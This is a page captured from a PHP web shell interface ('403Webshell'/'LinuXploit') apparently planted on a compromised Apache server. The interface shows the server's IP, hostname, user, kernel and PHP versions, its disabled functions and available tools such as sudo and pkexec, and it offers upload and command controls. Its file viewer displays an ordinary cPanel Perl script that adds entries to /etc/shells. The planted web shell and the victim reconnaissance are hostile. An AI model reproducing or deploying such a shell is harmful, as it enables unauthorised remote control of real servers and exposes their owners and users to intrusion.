403Webshell
Server IP : 101.53.144.229  /  Your IP : 216.73.216.181
Web Server : Apache
System : Linux host.gdigitalindia.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : digitalshiksha ( 1179)
PHP Version : 5.6.40
Disable Function : eval,show_source,system,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,show_source,curl_multi_exechellcmd, ini_restore,apache_get_modules,get_cfg_var,passthru, exec ,proc_get_status,fpassthru,c999_buff_prepare,c999_sess_put,c99_buff_prepare,c99_sess_put,proc_close,ini_alter,dl,symlink,link,proc_close,ini_alter,dl,symlink,link,mail
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /scripts//checkbashshell
#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/checkbashshell                  Copyright 2022 cPanel, L.L.C.
#                                                           All rights reserved.
# copyright@cpanel.net                                         http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

use strict;

my @shells = (
    '/usr/local/cpanel/bin/jailshell',
    '/usr/local/cpanel/bin/noshell',
    '/bin/bash',
    '/bin/false',
    '/bin/ftpsh',
);

my $contents = slurp_shells();

foreach my $shell (@shells) {
    if ( $contents !~ m/$shell/ ) {
        $contents .= "$shell\n";
    }
}

write_shells($contents);

exit;

sub slurp_shells {
    open( my $shells_fh, '<', '/etc/shells' ) or die "Couldn't open /etc/shells for reading: $!";
    local $/;
    my $contents = <$shells_fh>;
    $contents .= "\n" unless $contents =~ m/\n$/;
    return $contents;
}

sub write_shells {
    my ($contents) = @_;
    open( my $shells_fh, '>', '/etc/shells' ) or die "Couldn't open /etc/shells for writing: $!";
    print {$shells_fh} $contents;
    close $shells_fh or die "Couldn't write /etc/shells. Please verify its contents! $!";
}

Youez - 2016 - github.com/yon3zu
LinuXploit